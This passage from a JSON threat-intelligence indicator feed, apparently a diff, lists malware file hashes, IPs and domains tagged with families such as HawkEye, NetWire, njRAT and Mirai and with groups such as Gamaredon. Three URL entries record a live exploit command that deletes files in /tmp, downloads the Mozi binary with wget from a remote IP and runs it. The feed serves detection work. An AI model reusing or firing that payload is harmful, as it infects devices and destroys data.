"2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307655734, + "hash": [ + "5fdc5f6e6709854ab6c4a76e99918808", + "1a5cbbb4a1a43ed1da1381da74d610cbe28944d1", + "6b851e42c5767da59d14509002df0e7420091c091a94ad746656844760eee6ed" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3425b5c39b74c268326c49f17d2f4559e6cec1d1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307659084, + "hash": [ + "f4f023ea03953b4a5bb4a818e65a5a42", + "4b11545dd5fc699036e671d802a65b9115c1f1e5", + "68a1075d440785115f189442808bf6a54651cce99ed94c8f79e9ad35632ae3a6" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8c65e6f86547119aa8bfd88afbaff81e89414e48", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274308379895, + "hash": [ + "be726f464279b2b88c054fa7e44f8ab4", + "1687333070f0c9c132abbd8b15ac000be065cd0c", + "a5a61e8f05480c97c28308df2af134b8a2ec7b78324338ff6d410a5d4624bec9" + ], + "malwareList": [ + { + "name": "AsyncRAT", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "bf7070cac3497d9a6e5d9b618f0378369de34e7f", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "lyer3.xyz", + "seqUpdate": 17274336132953, + "malwareList": null, + "threatList": [ + { + "name": "Donot Team", + "title": "Donot Team - New indicators have been found" + } + ] + }, + { + "id": "9c5ec99f52dc45a7361bef3c7d4ab838040fcb7d", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274336173076, + "ip": [ + "154.9.235.17" + ], + "malwareList": null, + "threatList": [ + { + "name": "SideCopy", + "title": "SideCopy - New indicators have been found" + } + ] + }, + { + "id": "db34929880bcd371fccc9e6c9aeec5d54913fdb1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274347525580, + "hash": [ + "f421d7ca0d6d4c6737af88868173e705", + "daaeaba45589187696bbc1aec7df7844e451cdcd", + "9aed17deae25608c23d7e0e8a9f9bf5061a705019bfa476830d7b28bf19ac1d5" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "BackSwap", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "182edafcbe915a86ee575bc94d2ae3a9270cac7b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274348927265, + "hash": [ + "ddeeb8433845d5d41f115ff82a1e6c24", + "be4fd2bc0698daf772ee4adaa98ffba6bf75a4af", + "9be09f613f3c75c02a2ff1b8ab30d1c66861b8155e838e92156f5c965975bdf8" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "fdc69991e4716d52d60feadaa2962ab3b51472c1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274348927854, + "hash": [ + "cbed05c46cc7521b6be511808dc9fe52", + "d8bf5aff1eda880688b547817c15fb27545fc9d4", + "3b72fae5583397a2289167442a18021bc37086a525cedf9034aa3b988e171c57" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "6b3e5bd1a0f8b3e9a6fd0e5e31396c7f2d7599c7", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274348928199, + "hash": [ + "55b47d3b115df7babbcc040e99bb4058", + "dac610d1a87fe4338804da7ea319fb2fcb545833", + "a219a53e27d399a1d45adf4c0d0ce74688d3bd7764fe093b2fb7c486253dffda" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "2ba49a6966d178a92d459f5f6c102ccef38d11b9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274358687154, + "hash": [ + "b69f0a46e4d7ba1128dc28d626382d1c", + "da2f548b0215658f47a1e7174b4ce193112494c1", + "65a77893bc157ad59fbb25a66eaf3ef6baecd0384b73f8d6fe6a8a8176a69ada" + ], + "malwareList": [ + { + "name": "FlawedAmmyy", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "490ee55686350738271b49ca6040e464dc201852", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274364413825, + "ip": [ + "65.109.161.63" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e6f4512c7f95391cea199d43289ca023d64ecbff", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274364417472, + "ip": [ + "172.105.24.73" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "46840d5bb6f16f1bd796c39cd4919c1c92614547", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274368859171, + "hash": [ + "ce1fc9ccc0f51c460addcc8add1f1395", + "de33bec106bbd1f02712628666ff7163443c8241", + "723bea7a1be8aff0e81d72b1a6b1aaa56e330a2cec707d2bb8680fca7b079b04" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "bc1055de116dbb47734dc9e4892207e8668a525f", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274375334385, + "hash": [ + "ae6f2aa9b5d42b21c05c47b8c89953c4", + "cd3f302b272d80654500d84b0357c09a2e127dab", + "d84cd9e19d032ee3480c53ed671872e65f544348d9e148ae6ba0b6afb6212986" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d4719034b6c5f63a4b62733b68d0baa0dbe3872a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274377781309, + "hash": [ + "85e4db6ede475395100ed5636ea82987", + "c9336b45e77e7d6305c9c18e5fcc0fceb21cca8f", + "979cf23030d85d058482fb7e0ca93535ae0a8b4dc858979663e277e50b3fae49" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "47fca0d2d1c894eff9d2bad5790c1b832aefb16e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274377784125, + "hash": [ + "f81c87e62789558f5aa873556b44d2fc", + "dcdfd1ab57ebe453442d80e7bb59a5872b0ab3b9", + "9742134166b6b1981d78e29c2512ff2be79e666da8fa0b7f44c4543446907494" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "0d36203a7ebf53a1985701f68f3d65436bf268fc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274378320331, + "hash": [ + "a8c024072ec5e07e3bad47792a535bf3", + "7dae291271177f568b5d00e72cd7e920f5f01a69", + "9e641690ae66faffab157c16b1457728f1a0ccaf6a3f2b83b4171253fdaf14d0" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e71268355b6b73fe4a525caf4996b629cfd51e37", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274381196765, + "hash": [ + "2206b313a3eda55875ba6fd2286f27fa", + "e180ae6bce3eab5ca1b18dd3e951269ab168cd57", + "13b19b2e3ca0476b69e32b0417b81203098b1220315e2cc08741840b9233edfb" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "70816058c31254333f53f3087dbe195cdd8dde1a", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "www.toorisugita.ru", + "seqUpdate": 17274384205284, + "malwareList": null, + "threatList": [ + { + "name": "Gamaredon", + "title": "Gamaredon - New indicators have been found" + } + ] + }, + { + "id": "cd41c5d0daac1cc68247115f62cd54c398cbb985", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274385570407, + "hash": [ + "378b28c03897ad232799fa053ee10ecc", + "e0b96bc72940e592e27859ba31d2443af6d4fe86", + "c715848ee0a9578540aeb32bb86500b75a7d544c2ace6904cba6cc28cb708641" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "bf482a9529e847b6e5e965e5a1bb622ea50663b1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274385969949, + "hash": [ + "3b88eaf2f527a3f39a962bd671a4e989", + "e32500882bf1555d670d1fc62e2d5efd018543e1", + "ee7d7ffd1b18a148475542156a3919793ae15459879df4a7a482961284a48db5" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "0223e6bccfeb30e5f8e8f59d4448b29a6af4ee41", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274388148851, + "hash": [ + "24cbbe12f17595c97c1af4642357187a", + "e299f3dda715f0a03de64098a4db7c54dccbcc0c", + "648ea1b7a48bdbf9af513aa61a1baf51cdb3aea9472f7170f40848b3dc114c64" + ], + "malwareList": [ + { + "name": "Spora", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "de72b46468e7e09ba0b749545b52bd93661e1abc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274390470529, + "hash": [ + "9de760bd8d17878b4451e164c86cf6df", + "bc7b52ad6e3ebd54cdb174bc36e80c24419e1e54", + "116f2b27c2dbdbd90eb8231b5b83a0d6ad34616c2aaa3f7bd2ff1445244e1d27" + ], + "malwareList": [ + { + "name": "Gootkit", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "2d4e3926a8899f9f09e70402bd73f3a2ef3409a4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274390474696, + "hash": [ + "89c22ae6169a4c3fb6b8a4ccd9956586", + "c2cc7b96843909bb0a3887185296dc03e63ede1e", + "bfef3c7ffd8e136bceba615e6ecab826efdc7074dc2f501775c17a9c7d93a4a5" + ], + "malwareList": [ + { + "name": "Gootkit", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8e9e825486d790ef2b7e8e31503a2184f487b3db", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274390477762, + "hash": [ + "d927088ea18c1efefc74b93b9af2cab2", + "e0ab8210dede87d0ceadc97173afd36e833ad99b", + "77228588e51358d952c1a30eb05be837a0af8d52029628ad29226f8f9774a718" + ], + "malwareList": [ + { + "name": "Gootkit", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8fc283e3c6c11dec54cbb06247b8cb9b14344a69", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274390649015, + "hash": [ + "cad3de2a985857da7fcf2caa7a0f9401", + "e18a6e50b6e2316de12c9931dd09bb7753471b08", + "d3e42ce832ceaa6d6421474c414fcf9055faacd783accb7ac41970bc5a43ee36" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "eac4d0a460aa12ae3339aeb6658d62a3925d0184", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274390743314, + "hash": [ + "d55a4297e6e66ae56dab989e25b0d27b", + "ce18555d994c6e90be60096a30666aa24e91486f", + "aec2c56f483af409d980be7ef48ad7674e7004b137bcd3cfd928c982643ad120" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f309d8b38d68a2f6646d6620410009a84fbacf76", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274394137643, + "hash": [ + "d2ccf7849fbf824c9017bb792f532342", + "e45f36c06b0d7cb1745ce3d24d7e9bfe2584218c", + "f997d4a193edfbb05db544d0508024f4e00d34e774d3f5a2df6663e8a9f8587c" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7a35068e66d1f435c39887cc7b0bd0f230043225", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274394579336, + "hash": [ + "382746a97059c278137feda966a9a9da", + "d9cd04be26d9cb478b97fa5a95cd50609fc6b1f9", + "dad7c9456f5e150ad73f33688d962ca2076cd51f3a61f1f14e3c6864b7734733" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "88421d94ae0c9569f69771927cd730eef56f0020", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274394583010, + "hash": [ + "bad0c74a0a0ec1bc7e9eec6b5705dbf0", + "d9f28ca8b611a88eaac105cd9eb9c377c9212798", + "9f510a1c0af8f6d065702dcb1189a2572b6818259330031fedc9b42d15b60a24" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3c2d562ce4d5d5fe1b224d6a68418bf88a6ba1a2", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274394778143, + "hash": [ + "d67e609a0f8870ee5c5f576941cecb45", + "b6a77183de86b9c875476b4951a9bc85067f57bf", + "4c746f7353ec22799366e5b87f75a9c00d64af5d775aed54ef5cbd413c6576d6" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "026acdb25ef4f4a654253bda920bc0dbedc0d5f8", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274395471684, + "hash": [ + "d722759dab276601ce5a6071e282b6c4", + "dd05ec5bbc4a0fd9a375e8a8238b8579a964125f", + "6071511eea15d5b1d9d8bf9803ad71b3fe65c455b77d683a3aaf887fa54cb447" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "310607a1a9256ac2897ced1fc6fc9703dc243621", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274406173497, + "ip": [ + "36.41.184.42" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "85bc206911842c92a073f0f39c0368fc954cce01", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274407218907, + "hash": [ + "81d13c52f73074610ba6a10ebc02a27b", + "e5a332a7734e763a52de27e947a9eefbc1441346", + "735f772144022f1c62128a5348c180cc5df2d3642dda04af4035c199e40e8abd" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "3632ef6be762e6134cd5e3b80f2c19e62db0dea7", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274408424326, + "hash": [ + "a1293f1c2afa9da6b51d618e0174ca0e", + "e606cbdcb45a7e93fc4a8edcd172eee2a5832730", + "03e0d1f71cf040c5a7f1c5ef8933f705b35336cecc6592574dad1dd5066c00b9" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "5ed9561112cc4fe4207035f31df97d032ae08eea", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274409153512, + "hash": [ + "9b52dbefe7d0625b6b7f7f4019e83f50", + "e44929a0ac1cd663c5e9f1d51c88d4cdbb08eade", + "ee5a3419365f997d9b498192b1879bca2d8c807ae7f5ea21633a0d55533bac7e" + ], + "malwareList": [ + { + "name": "FlawedAmmyy", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a452045b7ba73e00486cdd74b95920bf71e25aa9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274435754806, + "hash": [ + "7b57aed415ba3bf05973b460b81f6bea", + "e6f3f3a26c3907f9ac35fa6937e9e7197d4abafd", + "5d63bc4a7bb09ebe55c3057d274f8a386d73f3dfb1d2ff19c56b75580f439a2e" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "7e4f558ab10288e65121f244d90a695dc392d497", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274435758044, + "hash": [ + "a0fad09ed4b8680bbd0532a646b169bb", + "e74da3aec697099edbe015ec290ba094fbe74765", + "592fed9892a45702e3aeac01a835d1ffc7b937638126a41254c546f511c2e9df" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "334072131fbc04d58483e8b3b223d2aecb0c6c4f", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274435761467, + "hash": [ + "af6a38b190a9855643d441488d393e32", + "e8eb03ac5484e476dc5b9677d2c97b6c013fa819", + "56bb9c26e51e4ab272ed0156e0f5effe06c2778ba7b6ccf31371bd662fbb60cd" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "3c977c8ebb2023b7d6031a36ca05321b9dbabf95", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274440087462, + "hash": [ + "7023aacc33944927c5dd809b0c5eaeb9", + "6e9c45f15d7057f9b88a2192ae2f4724187758c0", + "5bfd7465437992ff5cb457bcf7612222a5a2054f5805ab220e47f68563a450d6" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + } + ], + "threatList": null + }, + { + "id": "b86027d2e4733947eaae6b40cab8e6db10ebffbe", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274441571367, + "hash": [ + "ed339c1c0f77a243fe965da02e680f8a", + "e3f2d106e5257a9472d811b90c3b0ccb547c4bb3", + "e41378b088f49a71bf3b60b01c1ca6c0d68df021e108b482b7b56dc5fb625da1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1f0c9a3ba6dbaf349b81fb44cccfa8178e7ac1e5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274446106035, + "hash": [ + "fdba60a20306e2fda2bb1f9368a36003", + "ed728396886050f720f785ed485bda1c8b9ffc5d", + "631b05ecb72c7aff57c3fff7b5798645cbe828360b2a801943c1f7338ad7fa8b" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "394be6f384c3c57920b58300c22dadf4e321dba4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274446110720, + "hash": [ + "1813de79d1cd738474b7e65ff9380012", + "eda67d7fb6b3b7a96f83b8ce8f60cd5662487c9b", + "9eff2c7459e1d7e467a6818138ab91ea3402db7bda7259b527cabc2b032d7dbe" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "69f50a5dd0ca04a7278312f75546242041d9752e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274452953530, + "hash": [ + "916f1814bc272920b1b48ab3afebe9b4", + "effe0df21308811974a452fe909b987a16ce5f02", + "83e1b784d6f73136eb09ee432ce95cd0997b52e99dae1cffc691872088b90ca1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "af6f749d6de0a49db902e8832633c175514da89e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274464058830, + "hash": [ + "6b7943d9dcaec5290770f5b9bafb9df1", + "f1ec547493bd743a35c343a8f2ada2b3fbcd66bc", + "d7b8fde8d95721b5fdbc1b71aebd5ff05e4059394b2ef1f4cb59127f2097b819" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "93f69e2ea77b08535676aaeecb5898bafda05685", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274479768617, + "hash": [ + "22d670db0c5241a61a2bbf8ed97ea9ce", + "f1f6ee8cd17f571034497edb4aadf9056f10a3e6", + "8faaed349c4b8f0089699f4ba70b1626076c60eff0729024a0e9a7cd37dbf178" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "16e715c5370eec16819ae7e3595f564d498cdc1f", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "url": "https://185.186.92.178:80/shell?cd+/tmp;rm+-rf+*;wget+http://59.89.181.216:42895/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274485841403, + "ip": [ + "185.186.92.178" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f7bb4d448338499521a85fa3d8b61691e02d2af0", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "url": "http://185.186.92.178/shell?cd+/tmp;rm+-rf+*;wget+http:/59.89.181.216:42895/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274485842176, + "ip": [ + "185.186.92.178" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "24196937e7a8ff9bcddd8bf9002499f6cf3c41d0", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274485843549, + "ip": [ + "59.89.181.216" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fac227fec61059014d42490f9c2f7b96b7eff760", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274486950887, + "hash": [ + "b31f3b0b34fe8887b883bc3f60024c1b", + "f6a0a82eacff624ed413ddfea851ff099f3e6c36", + "d838314c9fcf6f437fe797689c3e54efc988b0257038667c033eba1b3b8105af" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "fb7cefcbe9fc3be873c1f9227da7b0af761d3059", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274494000933, + "hash": [ + "dc807112ced19dedb2b6370050de9692", + "f6cc899591d8879980e72001866a0c1ec31cb546", + "f161a087134b71508661985900682407f94e08ce9b988f5ec7a19c730ca477a8" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "364f329901072fb2a780734e81561afbb1c4ae55", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274515040470, + "hash": [ + "46f71c361c9143301b96c59c14590851", + "fb9bb002db369c33d7f1a103d9c40bed061206fc", + "28b0617ea41fcc6b9aea6811aa62dccd7b8bd6de65c7194e68c16d32a553eb6e" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "63d9cf4c3ea730b02a88933c06ae3f7c7551396d", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-19T00:00:00+03:00", + "url": "http://192.188.248.134/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274522225834, + "ip": [ + "192.188.248.134" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "606d36d1bb1303ed06bd33ae6794d3ac86dabaf9", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274522226434, + "ip": [ + "120.86.239.213" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a2ec7caa31d1f56b6cc02764b1becd6f2cf14a32", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274524655857, + "hash": [ + "06b3af3b4ea9f86a7e782f32904f0d3c", + "fb2ff0edc593e84b186dd9dd8a2e04dd6f47a78f", + "89082b01e6f6ab6dc69175b1216277ed7fd6d57d4791386fc445214e706c1d14" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "7c38c9ce204face2af7c193c0f546e109c906086", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-03T00:00:00+03:00", + "seqUpdate": 17274534252389, + "ip": [ + "157.173.104.92" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "eaaf0863d5056aff4b8aaeb54ac68608ead0d718", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274535353153, + "hash": [ + "c1bcd150e3e7e4a2d456a0d04d05f95b", + "fe76df9a0c55d9c7dc9d77299a785448bd9ad21c", + "bea80492aaf96600279ba18fbd7f42e2fa1b59afc29745d1d3258649757dee20" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "4be19bf146b6f120b7cd96765c2d9a2e0e5d186e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274543912402, + "hash": [ + "ffb4062b8c94ba74ea6778098a0b0147", + "07f96525c1f1ed94715a42488453f9c1cee7eff1", + "9edd1622b9cf1b2340f4a6605e26ebd0f996f97074c418bd15a4a9d457713898" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": 